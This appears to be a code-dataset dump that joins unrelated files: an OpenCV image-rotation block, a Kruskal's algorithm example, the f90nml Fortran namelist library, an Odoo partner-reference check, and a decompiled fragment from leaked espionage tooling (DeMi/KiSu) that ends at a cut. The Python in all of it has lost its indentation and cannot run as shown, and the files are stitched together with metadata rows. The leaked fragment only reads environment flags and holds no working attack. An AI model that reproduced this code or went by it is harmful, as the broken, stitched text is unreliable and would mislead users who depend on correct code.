# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
self.widgets['prop_confirm'].grab_focus()
for Property in self.block_properties:
if Property.name == "xC":
Property.value = unicode(self.widgets['xC'].get_value())
if Property.name == "yC":
Property.value = unicode(self.widgets['yC'].get_value())
if Property.name == "isCenter":
if self.widgets['isAtCenter'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isFilling":
if self.widgets['isFilling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isScalling":
if self.widgets['isScalling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
blockTemplate.header += "#define PI 3.1415926535898\n"
blockTemplate.header += "double rads(double degs){\n"
blockTemplate.header += " return (PI/180 * degs);\n"
blockTemplate.header += "}\n\n"
for propIter in blockTemplate.properties:
if propIter[0] == 'xC':
xC = propIter[1]
elif propIter[0] == 'yC':
yC = propIter[1]
elif propIter[0] == 'isFilling':
isFilling = propIter[1]
elif propIter[0] == 'isCenter':
isCenter = propIter[1]
elif propIter[0] == 'isScalling':
isScalling = propIter[1]
blockTemplate.imagesIO = '\nIplImage * block$$_img_i1 = NULL;\n' + \
'double block$$_double_i2;\n' + \
'IplImage * block$$_img_o1 = NULL;\n'
blockTemplate.imagesIO += '\n\n'
blockTemplate.functionCall = '\n if(block$$_img_i1)\n {\n' + \
' double scale;\n int H;\n int W;\n' + \
' W = block$$_img_i1->width;\n' + \
' H = block$$_img_i1->height;\n' + \
' block$$_img_o1 = cvCreateImage(cvSize(W,H),block$$_img_i1->depth,block$$_img_i1->nChannels);\n' + \
' CvMat* mat = cvCreateMat(2,3,CV_32FC1);\n'
if isCenter == "true":
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(W/2, H/2);\n'
else:
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(' + str(int(float(xC))) + ',' + str(
int(float(yC))) + ');\n'
if isScalling == "true":
blockTemplate.functionCall += ' scale = H/(fabs(H*sin(rads(90-abs(block$$_double_i2)))) + fabs(W*sin(rads(abs(block$$_double_i2)))));\n' + \
' cv2DRotationMatrix(center,block$$_double_i2,scale,mat);\n'
else:
blockTemplate.functionCall += ' cv2DRotationMatrix(center,block$$_double_i2,1.0,mat);\n'
if isFilling == "true":
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,CV_WARP_FILL_OUTLIERS,cvScalarAll(0));\n'
else:
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,0,cvScalarAll(0));\n'
blockTemplate.functionCall += ' }\n'
blockTemplate.dealloc = 'cvReleaseImage(&block$$_img_o1);\n' + \
'cvReleaseImage(&block$$_img_i1);\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Rotate Image"),
"Path": {"Python": "rotate",
"Glade": "glade/rotate.ui",
"Xml": "xml/rotate.xml"},
"Icon": "images/rotate.png",
"Color": "90:5:10:150",
"InTypes": {0: "HRP_IMAGE", 1: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_IMAGE"},
"Description": _("Rotates input image the input angle degrees. (More options inside)"),
"TreeGroup": _("Experimental")
}
| gpl-2.0 | 1,089,525,163,356,173,600 | 38.475 | 149 | 0.519105 | false | 3.785058 | false | false | false |
dsysoev/fun-with-algorithms | graph/kruskal.py | 1 | 2967 |
"""
Kruskal's algorithm
https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
from __future__ import print_function
class Graph(object):
""" Simple implementation of directed acyclic graph
Parameters
----------
nodes : set
set of all nodes in the graph
dependencies : list
list of tuples (weight, node1, node2) which show connection
between nodes of the graph with appropriate weight
"""
def __init__(self, nodes, dependencies):
self.nodes = nodes
self.dependencies = dependencies
self.parent = {}
self.rank = {}
def __str__(self):
""" string representation of the graph """
string = ''
for node in sorted(self.nodes):
strnode = ["{} -> {} ({})".format(start, end, w)
for w, start, end in self.dependencies if start == node]
string += "node {}: {}\n".format(node, " ".join(strnode))
return string[:-1]
def find(self, edge):
""" for current edge return parent edge """
if self.parent[edge] != edge:
self.parent[edge] = self.find(self.parent[edge])
return self.parent[edge]
def union(self, edge1, edge2):
""" union edge1 and edge2 into one tree """
root1 = self.find(edge1)
root2 = self.find(edge2)
if root1 == root2:
return
if self.rank[root1] > self.rank[root2]:
self.parent[root2] = root1
else:
self.parent[root1] = root2
if self.rank[root1] == self.rank[root2]:
self.rank[root2] += 1
def minimum_spanning_tree(self):
""" a minimum spanning tree
Returns
-------
out : set
return a set of tuples (weight, node1, node2)
with minimum spanning tree for a connected weighted graph
"""
# make_set
self.parent = {node: node for node in self.nodes}
self.rank = {node: 0 for node in self.nodes}
# sort edges
# weight should be first item in tuple
edges = self.dependencies
edges.sort()
# set initial tree
minimum_spanning_tree = set()
for weight, edge1, edge2 in edges:
if self.find(edge1) != self.find(edge2):
# union edge1 and edge2
self.union(edge1, edge2)
# add new dependence to the tree
minimum_spanning_tree.add((weight, edge1, edge2))
return minimum_spanning_tree
if __name__ == '__main__':
GRAPH_NODES = {0, 1, 2, 3, 4, 5, 6, 7}
# [(weight, node1, node2), ...]
GRAPH_DEPENDECIES = [(4, 0, 4), (7, 4, 2), (6, 2, 6), (8, 0, 1),
(3, 1, 5), (7, 5, 7), (6, 5, 6), (8, 5, 2)]
GRAPH = Graph(GRAPH_NODES, GRAPH_DEPENDECIES)
print("Show graph:\n{}\n".format(GRAPH))
print("Minimum spanning tree: {}".format(GRAPH.minimum_spanning_tree()))
| mit | -5,975,846,086,834,512,000 | 31.604396 | 79 | 0.539939 | false | 3.774809 | false | false | false |
marshallward/f90nml | f90nml/namelist.py | 1 | 34448 | """Fortran namelist interface.
The ``Namelist`` is a representation of a Fortran namelist and its contents in
a Python environment.
:copyright: Copyright 2014 Marshall Ward, see AUTHORS for details.
:license: Apache License, Version 2.0, see LICENSE for details.
"""
from __future__ import print_function
import itertools
import copy
import numbers
import os
import platform
try:
from StringIO import StringIO # Python 2.x
except ImportError:
from io import StringIO # Python 3.x
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
try:
basestring # Python 2.x
except NameError:
basestring = str # Python 3.x
class Namelist(OrderedDict):
"""Representation of Fortran namelist in a Python environment.
Namelists can be initialised as empty or with a pre-defined `dict` of
`items`. If an explicit default start index is required for `items`, then
it can be initialised with the `default_start_index` input argument.
In addition to the standard methods supported by `dict`, several additional
methods and properties are provided for working with Fortran namelists.
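    A small, hypothetical example of constructing and indexing a namelist:
    >>> nml = Namelist({'config_nml': {'input': 'wind.nc', 'steps': 864}})
    >>> nml['config_nml']['steps']
    864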
"""
class RepeatValue(object):
"""Container class for output using repeat counters."""
def __init__(self, n, value):
"""Create the RepeatValue object."""
self.repeats = n
self.value = value
def __init__(self, *args, **kwds):
"""Create the Namelist object."""
s_args = list(args)
# If using (unordered) dict, then resort the keys for reproducibility
# NOTE: Python 3.7+ dicts are order-preserving.
if (args and not isinstance(args[0], OrderedDict) and
isinstance(args[0], dict)):
s_args[0] = sorted(args[0].items())
# Assign the default start index
try:
self._default_start_index = kwds.pop('default_start_index')
except KeyError:
self._default_start_index = None
super(Namelist, self).__init__(*s_args, **kwds)
# We internally track the list of cogroups (groups of the same name),
# although this could be replaced with a per-access search.
self._cogroups = []
self.start_index = self.pop('_start_index', {})
# Update the complex tuples as intrinsics
# TODO: We are effectively setting these twice. Instead, fetch these
# from s_args rather than relying on Namelist to handle the content.
if '_complex' in self:
for key in self['_complex']:
if all(isinstance(v, list) for v in self[key]):
self[key] = [complex(*v) for v in self[key]]
else:
self[key] = complex(*self[key])
self.pop('_complex')
# Formatting properties
self._column_width = 72
self._indent = 4 * ' '
self._end_comma = False
self._uppercase = False
self._float_format = ''
self._logical_repr = {False: '.false.', True: '.true.'}
self._index_spacing = False
self._repeat_counter = False
self._split_strings = False
# Namelist group spacing flag
self._newline = False
# Check for pre-set indentation
self.indent = self.pop('_indent', self.indent)
# PyPy 2 is dumb and does not use __setitem__() inside __init__()
# This loop will explicitly convert any internal dicts to Namelists.
if (platform.python_implementation() == 'PyPy' and
platform.python_version_tuple()[0] == '2'):
for key, value in self.items():
self[key] = value
def __contains__(self, key):
"""Case-insensitive interface to OrderedDict."""
return super(Namelist, self).__contains__(key.lower())
def __delitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
lkey = key.lower()
if lkey in self._cogroups:
# Remove all cogroup values
cogrp = Cogroup(self, lkey)
for gkey in cogrp.keys:
super(Namelist, self).__delitem__(gkey)
self._cogroups.remove(lkey)
else:
super(Namelist, self).__delitem__(key)
def __getitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
if isinstance(key, basestring):
lkey = key.lower()
if lkey in self._cogroups:
return Cogroup(self, lkey)
else:
return super(Namelist, self).__getitem__(lkey)
else:
keyiter = iter(key)
grp, var = next(keyiter).lower(), next(keyiter).lower()
return super(Namelist, self).__getitem__(grp).__getitem__(var)
def __setitem__(self, key, value):
"""Case-insensitive interface to OrderedDict.
Python dict inputs to the Namelist, such as derived types, are also
converted into Namelists.
"""
# Promote dicts to Namelists
if isinstance(value, dict) and not isinstance(value, Namelist):
value = Namelist(
value,
default_start_index=self.default_start_index
)
# Convert list of dicts to list of namelists
# (NOTE: This may be for legacy cogroup support? Can it be dropped?)
elif is_nullable_list(value, dict):
for i, v in enumerate(value):
if isinstance(v, Namelist) or v is None:
value[i] = v
else:
# value is a non-Namelist dict
value[i] = Namelist(
v,
default_start_index=self.default_start_index
)
lkey = key.lower()
super(Namelist, self).__setitem__(lkey, value)
def __str__(self):
"""Print the Fortran representation of the namelist.
Currently this can only be applied to the full contents of the namelist
        file.  Individual namelist groups or values may not render correctly.
"""
output = StringIO()
if all(isinstance(v, Namelist) for v in self.values()):
self._writestream(output)
else:
print(repr(self), file=output)
nml_string = output.getvalue().rstrip()
output.close()
return nml_string
# Format configuration
@property
def column_width(self):
"""Set the maximum number of characters per line of the namelist file.
:type: ``int``
:default: 72
Tokens longer than ``column_width`` are allowed to extend past this
limit.
"""
return self._column_width
@column_width.setter
def column_width(self, width):
"""Validate and set the column width."""
if isinstance(width, int):
if width >= 0:
self._column_width = width
else:
raise ValueError('Column width must be nonnegative.')
else:
raise TypeError('Column width must be a nonnegative integer.')
@property
def default_start_index(self):
"""Set the default start index for vectors with no explicit index.
:type: ``int``, ``None``
:default: ``None``
When the `default_start_index` is set, all vectors without an explicit
start index are assumed to begin with `default_start_index`. This
index is shown when printing the namelist output.
If set to `None`, then no start index is assumed and is left as
implicit for any vectors undefined in `start_index`.
"""
return self._default_start_index
@default_start_index.setter
def default_start_index(self, value):
if not isinstance(value, int):
raise TypeError('default_start_index must be an integer.')
self._default_start_index = value
@property
def end_comma(self):
"""Append commas to the end of namelist variable entries.
:type: ``bool``
:default: ``False``
Fortran will generally disregard any commas separating variable
assignments, and the default behaviour is to omit these commas from the
output. Enabling this flag will append commas at the end of the line
for each variable assignment.
"""
return self._end_comma
@end_comma.setter
def end_comma(self, value):
"""Validate and set the comma termination flag."""
if not isinstance(value, bool):
raise TypeError('end_comma attribute must be a logical type.')
self._end_comma = value
@property
def false_repr(self):
"""Set the string representation of logical false values.
:type: ``str``
:default: ``'.false.'``
This is equivalent to the first element of ``logical_repr``.
"""
return self._logical_repr[0]
@false_repr.setter
def false_repr(self, value):
"""Validate and set the logical false representation."""
if isinstance(value, str):
if not (value.lower().startswith('f') or
value.lower().startswith('.f')):
raise ValueError("Logical false representation must start "
"with 'F' or '.F'.")
else:
self._logical_repr[0] = value
else:
raise TypeError('Logical false representation must be a string.')
@property
def float_format(self):
"""Set the namelist floating point format.
:type: ``str``
:default: ``''``
The property sets the format string for floating point numbers,
following the format expected by the Python ``format()`` function.
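        For example (illustrative), setting ``float_format = '.3e'`` writes the
        value ``12.3456`` as ``1.235e+01``.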
"""
return self._float_format
@float_format.setter
def float_format(self, value):
"""Validate and set the upper case flag."""
if isinstance(value, str):
# Duck-test the format string; raise ValueError on fail
'{0:{1}}'.format(1.23, value)
self._float_format = value
else:
raise TypeError('Floating point format code must be a string.')
@property
def indent(self):
r"""Set the whitespace indentation of namelist entries.
:type: ``int``, ``str``
:default: ``' '`` (four spaces)
This can be set to an integer, denoting the number of spaces, or to an
explicit whitespace character, such as a tab (``\t``).
"""
return self._indent
@indent.setter
def indent(self, value):
"""Validate and set the indent width."""
# Explicit indent setting
if isinstance(value, str):
if value.isspace() or len(value) == 0:
self._indent = value
else:
raise ValueError('String indentation can only contain '
'whitespace.')
# Set indent width
elif isinstance(value, int):
if value >= 0:
self._indent = value * ' '
else:
raise ValueError('Indentation spacing must be nonnegative.')
else:
raise TypeError('Indentation must be specified by string or space '
'width.')
@property
def index_spacing(self):
"""Apply a space between indexes of multidimensional vectors.
:type: ``bool``
:default: ``False``
"""
return self._index_spacing
@index_spacing.setter
def index_spacing(self, value):
"""Validate and set the index_spacing flag."""
if not isinstance(value, bool):
raise TypeError('index_spacing attribute must be a logical type.')
self._index_spacing = value
# NOTE: This presumes that bools and ints are identical as dict keys
@property
def logical_repr(self):
"""Set the string representation of logical values.
:type: ``dict``
:default: ``{False: '.false.', True: '.true.'}``
There are multiple valid representations of True and False values in
Fortran. This property sets the preferred representation in the
namelist output.
The properties ``true_repr`` and ``false_repr`` are also provided as
interfaces to the elements of ``logical_repr``.
"""
return self._logical_repr
@logical_repr.setter
def logical_repr(self, value):
"""Set the string representation of logical values."""
if not any(isinstance(value, t) for t in (list, tuple)):
raise TypeError("Logical representation must be a tuple with "
"a valid true and false value.")
if not len(value) == 2:
raise ValueError("List must contain two values.")
self.false_repr = value[0]
self.true_repr = value[1]
@property
def repeat_counter(self):
"""Return whether the namelist uses repeat counters for arrays.
If True, then arrays with repeated values will use repeat tokens. For
example, the array ``[1, 2, 2, 2]`` will be written as ``1, 3*2``.
:type: ``bool``
:default: ``False``
"""
return self._repeat_counter
@repeat_counter.setter
def repeat_counter(self, value):
"""Set whether array output should be done in repeat form."""
if isinstance(value, bool):
self._repeat_counter = value
else:
raise TypeError(r"repeat must be of type ``bool``")
@property
def split_strings(self):
"""Split strings at the ``column_width`` over multiple lines.
:type: ``bool``
:default: ``False``
"""
return self._split_strings
@split_strings.setter
def split_strings(self, value):
"""Validate and set the split_strings flag."""
if not isinstance(value, bool):
raise TypeError('split_strings attribute must be a logical type.')
self._split_strings = value
@property
def start_index(self):
"""Set the starting index for each vector in the namelist.
:type: ``dict``
:default: ``{}``
``start_index`` is stored as a dict which contains the starting index
for each vector saved in the namelist. For the namelist ``vec.nml``
shown below,
.. code-block:: fortran
&vec_nml
a = 1, 2, 3
b(0:2) = 0, 1, 2
c(3:5) = 3, 4, 5
d(:,:) = 1, 2, 3, 4
/
the ``start_index`` contents are
.. code:: python
>>> import f90nml
>>> nml = f90nml.read('vec.nml')
>>> nml['vec_nml'].start_index
{'b': [0], 'c': [3], 'd': [None, None]}
The starting index of ``a`` is absent from ``start_index``, since its
starting index is unknown and its values cannot be assigned without
referring to the corresponding Fortran source.
"""
return self._start_index
@start_index.setter
def start_index(self, value):
"""Validate and set the vector start index."""
# TODO: Validate contents? (May want to set before adding the data.)
if not isinstance(value, dict):
raise TypeError('start_index attribute must be a dict.')
self._start_index = value
@property
def true_repr(self):
"""Set the string representation of logical true values.
:type: ``str``
:default: ``.true.``
This is equivalent to the second element of ``logical_repr``.
"""
return self._logical_repr[1]
@true_repr.setter
def true_repr(self, value):
"""Validate and set the logical true representation."""
if isinstance(value, str):
if not (value.lower().startswith('t') or
value.lower().startswith('.t')):
raise ValueError("Logical true representation must start with "
"'T' or '.T'.")
else:
self._logical_repr[1] = value
else:
raise TypeError('Logical true representation must be a string.')
@property
def uppercase(self):
"""Print group and variable names in uppercase.
:type: ``bool``
:default: ``False``
        When enabled, all group and variable names are written in uppercase.
"""
return self._uppercase
@uppercase.setter
def uppercase(self, value):
"""Validate and set the uppercase flag."""
if not isinstance(value, bool):
raise TypeError('uppercase attribute must be a logical type.')
self._uppercase = value
def write(self, nml_path, force=False, sort=False):
"""Write Namelist to a Fortran 90 namelist file.
>>> nml = f90nml.read('input.nml')
>>> nml.write('out.nml')
"""
nml_is_file = hasattr(nml_path, 'read')
if not force and not nml_is_file and os.path.isfile(nml_path):
raise IOError('File {0} already exists.'.format(nml_path))
nml_file = nml_path if nml_is_file else open(nml_path, 'w')
try:
self._writestream(nml_file, sort)
finally:
if not nml_is_file:
nml_file.close()
def patch(self, nml_patch):
"""Update the namelist from another partial or full namelist.
This is different from the intrinsic `update()` method, which replaces
a namelist section. Rather, it updates the values within a section.
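        A small example with hypothetical group and variable names:
        >>> nml = Namelist({'config_nml': {'input': 'a.nc', 'steps': 10}})
        >>> nml.patch({'config_nml': {'steps': 20}})
        >>> nml['config_nml']['steps'], nml['config_nml']['input']
        (20, 'a.nc')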
"""
for sec in nml_patch:
if sec not in self:
self[sec] = Namelist()
self[sec].update(nml_patch[sec])
def add_cogroup(self, key, val):
"""Append a duplicate group to the Namelist as a new group."""
# TODO: What to do if it's a new group? Add normally?
lkey = key.lower()
assert lkey in self or lkey in self._cogroups
grps = self[lkey]
# Set up the cogroup if it does not yet exist
if isinstance(grps, Namelist):
# NOTE: We re-use the key to preserve the original order.
self._cogroups.append(lkey)
grps = [grps]
# Generate the cogroup label and add to the Namelist
# NOTE: In order to preserve ordering, we cannot reuse a key which may
# have been removed. So we always generate a new key based on the
# largest index. If no key is present, initialize with 1.
# Gather the list of existing IDs
hdr = '_grp_{0}_'.format(key)
idx = [int(k.split(hdr)[1]) for k in self if k.startswith(hdr)]
try:
cogrp_id = 1 + max(idx)
except ValueError:
cogrp_id = 1
cogrp_key = '_'.join(['_grp', lkey, str(cogrp_id)])
self[cogrp_key] = val
def groups(self):
"""Return an iterator that spans values with group and variable names.
Elements of the iterator consist of a tuple containing two values. The
        first is an internal tuple containing the current namelist group and its
variable name. The second element of the returned tuple is the value
associated with the current group and variable.
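        A short example with hypothetical names:
        >>> nml = Namelist({'config_nml': {'dt': 0.5, 'steps': 10}})
        >>> list(nml.groups())
        [(('config_nml', 'dt'), 0.5), (('config_nml', 'steps'), 10)]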
"""
for key, value in self.items():
for inner_key, inner_value in value.items():
yield (key, inner_key), inner_value
def _writestream(self, nml_file, sort=False):
"""Output Namelist to a streamable file object."""
# Reset newline flag
self._newline = False
if sort:
sel = Namelist(sorted(self.items(), key=lambda t: t[0]))
else:
sel = self
for grp_name, grp_vars in sel.items():
# Check for repeated namelist records (saved as lists)
if isinstance(grp_vars, list):
for g_vars in grp_vars:
self._write_nmlgrp(grp_name, g_vars, nml_file, sort)
else:
self._write_nmlgrp(grp_name, grp_vars, nml_file, sort)
def _write_nmlgrp(self, grp_name, grp_vars, nml_file, sort=False):
"""Write namelist group to target file."""
if self._newline:
print(file=nml_file)
self._newline = True
# Strip metadata label for repeat groups
if grp_name.startswith('_grp_'):
grp_name = grp_name[5:].rsplit('_', 1)[0]
if self.uppercase:
grp_name = grp_name.upper()
if sort:
grp_vars = Namelist(sorted(grp_vars.items(), key=lambda t: t[0]))
print('&{0}'.format(grp_name), file=nml_file)
for v_name, v_val in grp_vars.items():
v_start = grp_vars.start_index.get(v_name, None)
for v_str in self._var_strings(v_name, v_val, v_start=v_start):
print(v_str, file=nml_file)
print('/', file=nml_file)
def _var_strings(self, v_name, v_values, v_idx=None, v_start=None):
"""Convert namelist variable to list of fixed-width strings."""
if self.uppercase:
v_name = v_name.upper()
var_strs = []
# Parse a multidimensional array
if is_nullable_list(v_values, list):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else None
# FIXME: We incorrectly assume 1-based indexing if it is
# unspecified. This is necessary because our output method always
# separates the outer axes to one per line. But we cannot do this
# if we don't know the first index (which we are no longer assuming
# to be 1-based elsewhere). Unfortunately, the solution needs a
# rethink of multidimensional output.
# NOTE: Fixing this would also clean up the output of todict(),
# which is now incorrectly documenting unspecified indices as 1.
# For now, we will assume 1-based indexing here, just to keep
# things working smoothly.
if i_s is None:
i_s = 1
for idx, val in enumerate(v_values, start=i_s):
v_idx_new = v_idx + [idx]
v_strs = self._var_strings(v_name, val, v_idx=v_idx_new,
v_start=v_start)
var_strs.extend(v_strs)
# Parse derived type contents
elif isinstance(v_values, Namelist):
for f_name, f_vals in v_values.items():
v_title = '%'.join([v_name, f_name])
v_start_new = v_values.start_index.get(f_name, None)
v_strs = self._var_strings(v_title, f_vals,
v_start=v_start_new)
var_strs.extend(v_strs)
# Parse an array of derived types
elif is_nullable_list(v_values, Namelist):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else 1
for idx, val in enumerate(v_values, start=i_s):
# Skip any empty elements in a list of derived types
if val is None:
continue
v_title = v_name + '({0})'.format(idx)
v_strs = self._var_strings(v_title, val)
var_strs.extend(v_strs)
else:
use_default_start_index = False
if not isinstance(v_values, list):
v_values = [v_values]
use_default_start_index = False
else:
use_default_start_index = self.default_start_index is not None
# Print the index range
# TODO: Include a check for len(v_values) to determine if vector
if v_idx or v_start or use_default_start_index:
v_idx_repr = '('
if v_start or use_default_start_index:
if v_start:
i_s = v_start[0]
else:
i_s = self.default_start_index
if i_s is None:
v_idx_repr += ':'
else:
i_e = i_s + len(v_values) - 1
if i_s == i_e:
v_idx_repr += '{0}'.format(i_s)
else:
v_idx_repr += '{0}:{1}'.format(i_s, i_e)
else:
v_idx_repr += ':'
if v_idx:
idx_delim = ', ' if self._index_spacing else ','
v_idx_repr += idx_delim
v_idx_repr += idx_delim.join(str(i) for i in v_idx[::-1])
v_idx_repr += ')'
else:
v_idx_repr = ''
# Split output across multiple lines (if necessary)
v_header = self.indent + v_name + v_idx_repr + ' = '
val_strs = []
val_line = v_header
if self._repeat_counter:
v_values = list(
self.RepeatValue(len(list(x)), val)
for val, x in itertools.groupby(v_values)
)
for i_val, v_val in enumerate(v_values):
# Increase column width if the header exceeds this value
if len(v_header) >= self.column_width:
column_width = len(v_header) + 1
else:
column_width = self.column_width
if len(val_line) < column_width:
# NOTE: We allow non-strings to extend past the column
# limit, but strings will be split as needed.
v_str = self._f90repr(v_val)
# Set a comma placeholder if needed
if i_val < len(v_values) - 1 or self.end_comma:
v_comma = ', '
else:
v_comma = ''
if self.split_strings and isinstance(v_val, str):
idx = column_width - len(val_line + v_comma.rstrip())
# Split the line along idx until we either exceed the
# column width, or read the end of the string.
v_l, v_r = v_str[:idx], v_str[idx:]
if v_r:
# Check if string can fit on the next line
new_val_line = (
' ' * len(v_header) + v_str + v_comma
)
if len(new_val_line.rstrip()) <= column_width:
val_strs.append(val_line)
val_line = ' ' * len(v_header)
else:
# Split string across multiple lines
while v_r:
val_line += v_l
val_strs.append(val_line)
val_line = ''
idx = column_width - len(v_comma.rstrip())
v_l, v_r = v_r[:idx], v_r[idx:]
v_str = v_l
val_line += v_str + v_comma
# Line break
if len(val_line) >= column_width:
# Append current line to list of lines
val_strs.append(val_line.rstrip())
# Start new line with space corresponding to header
val_line = ' ' * len(v_header)
# Append any remaining values
if val_line and not val_line.isspace():
val_strs.append(val_line.rstrip())
# Final null values must always precede a comma
if val_strs and v_values[-1] is None:
# NOTE: val_strs has been rstrip-ed so lead with a space
val_strs[-1] += ' ,'
# Complete the set of values
if val_strs:
var_strs.extend(val_strs)
return var_strs
def todict(self, complex_tuple=False):
"""Return a dict equivalent to the namelist.
Since Fortran variables and names cannot start with the ``_``
character, any keys starting with this token denote metadata, such as
starting index.
The ``complex_tuple`` flag is used to convert complex data into an
equivalent 2-tuple, with metadata stored to flag the variable as
complex. This is primarily used to facilitate the storage of the
namelist into an equivalent format which does not support complex
numbers, such as JSON or YAML.
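        For example (hypothetical group name):
        >>> Namelist({'grp': {'z': 1+2j}}).todict(complex_tuple=True)['grp']['z']
        [1.0, 2.0]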
"""
# TODO: Preserve ordering
nmldict = OrderedDict(self)
# Search for namelists within the namelist
# TODO: Move repeated stuff to new functions
for key, value in self.items():
if isinstance(value, Namelist):
nml = copy.deepcopy(value)
nmldict[key] = nml.todict(complex_tuple)
elif isinstance(value, complex) and complex_tuple:
nmldict[key] = [value.real, value.imag]
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
elif isinstance(value, list):
complex_list = False
for idx, entry in enumerate(value):
if isinstance(entry, Namelist):
nml = copy.deepcopy(entry)
nmldict[key][idx] = nml.todict(complex_tuple)
elif isinstance(entry, complex) and complex_tuple:
nmldict[key][idx] = [entry.real, entry.imag]
complex_list = True
if complex_list:
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
# Append the start index if present
if self.start_index:
nmldict['_start_index'] = self.start_index
return nmldict
def _f90repr(self, value):
"""Convert primitive Python types to equivalent Fortran strings."""
if isinstance(value, self.RepeatValue):
return self._f90repeat(value)
elif isinstance(value, bool):
return self._f90bool(value)
elif isinstance(value, numbers.Integral):
return self._f90int(value)
elif isinstance(value, numbers.Real):
return self._f90float(value)
elif isinstance(value, numbers.Complex):
return self._f90complex(value)
elif isinstance(value, basestring):
return self._f90str(value)
elif value is None:
return ''
else:
raise ValueError('Type {0} of {1} cannot be converted to a Fortran'
' type.'.format(type(value), value))
def _f90repeat(self, value):
"""Return a Fortran 90 representation of a repeated value."""
if value.repeats == 1:
return self._f90repr(value.value)
else:
return "{0}*{1}".format(value.repeats,
self._f90repr(value.value))
def _f90bool(self, value):
"""Return a Fortran 90 representation of a logical value."""
return self.logical_repr[value]
def _f90int(self, value):
"""Return a Fortran 90 representation of an integer."""
return str(value)
def _f90float(self, value):
"""Return a Fortran 90 representation of a floating point number."""
return '{0:{fmt}}'.format(value, fmt=self.float_format)
def _f90complex(self, value):
"""Return a Fortran 90 representation of a complex number."""
return '({0:{fmt}}, {1:{fmt}})'.format(value.real, value.imag,
fmt=self.float_format)
def _f90str(self, value):
"""Return a Fortran 90 representation of a string."""
# Replace Python quote escape sequence with Fortran
result = repr(str(value)).replace("\\'", "''").replace('\\"', '""')
# Un-escape the Python backslash escape sequence
result = result.replace('\\\\', '\\')
return result
# TODO: Move to separate file? What about ref to Namelist?
class Cogroup(list):
"""List of Namelist groups which share a common key.
Although Namelists are organized as associative arrays, access is
    typically through a serial I/O data stream.  One consequence is that a
    namelist may contain the same group key multiple times, each with its own
    values.
This object returns a list of namelist groups which use the same key.
Internal keys correspond to the original ordering in the namelist.
When an element of the list is updated, the corresponding namelist element
is also updated.
"""
def __init__(self, nml, key, *args, **kwds):
"""Generate list of Namelist cogroups linked to parent namelist."""
self.nml = nml
self.key = key
grps = [OrderedDict.__getitem__(self.nml, k) for k in self.keys]
super(Cogroup, self).__init__(grps, **kwds)
def __setitem__(self, index, value):
"""Update cogroup list and parent namelist."""
key = self.keys[index]
OrderedDict.__setitem__(self.nml, key, value)
def __delitem__(self, index):
gkey = self.keys[index]
OrderedDict.__delitem__(self.nml, gkey)
super(Cogroup, self).__delitem__(index)
# Remove the cogroup status if keys are depleted
if len(self) == 0:
self.nml._cogroups.remove(self.key)
@property
def keys(self):
"""Return the namelist keys in the cogroup."""
cogrp_keys = [
k for k in self.nml
if k.startswith('_grp_{}'.format(self.key))
or k == self.key
]
return cogrp_keys
def is_nullable_list(val, vtype):
"""Return True if list contains either values of type `vtype` or None."""
return (isinstance(val, list) and
any(isinstance(v, vtype) for v in val) and
all((isinstance(v, vtype) or v is None) for v in val))
| apache-2.0 | 6,405,817,952,973,433,000 | 34.808732 | 79 | 0.547724 | false | 4.373794 | false | false | false |
brain-tec/partner-contact | partner_ref_unique/models/res_partner.py | 2 | 1192 | # Copyright 2016 Antonio Espinosa
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo import _, api, models
from odoo.exceptions import ValidationError
class ResPartner(models.Model):
_inherit = "res.partner"
@api.multi
@api.constrains('ref', 'is_company', 'company_id')
def _check_ref(self):
for partner in self:
mode = partner.company_id.partner_ref_unique
if (partner.ref and (
mode == 'all' or
(mode == 'companies' and partner.is_company))):
domain = [
('id', '!=', partner.id),
('ref', '=', partner.ref),
]
if mode == 'companies':
domain.append(('is_company', '=', True))
other = self.search(domain)
# active_test is False when called from
# base.partner.merge.automatic.wizard
if other and self.env.context.get("active_test", True):
raise ValidationError(
_("This reference is equal to partner '%s'") %
other[0].display_name)
| agpl-3.0 | 5,771,191,152,878,194,000 | 36.25 | 71 | 0.510067 | false | 4.350365 | false | false | false |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/DeMi/PyScripts/Lib/demi/__init__.py | 1 | 3580 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import demi.windows
import demi.registry
import dsz.env
import re
ConnectedEnv = '_DEMI_KISU_COMMS_ESTABLISHED'
KiSuEnabledEnv = '_DEMI_KISU_ENABLED'
def IsConnected():
id = ConnectedId()
return id != None
def ConnectedId():
curId = None
try:
curId = int(dsz.env.Get(ConnectedEnv), 16)
if curId == 0:
return
return curId
except:
return
return
def UseKiSu():
if not IsConnected():
return False
try:
state = dsz.env.Get(KiSuEnabledEnv)
if state.lower() in ('true', 'enabled', 'on', '1', 'go', 'use'):
return True
except:
pass
return False
def EnableKiSu():
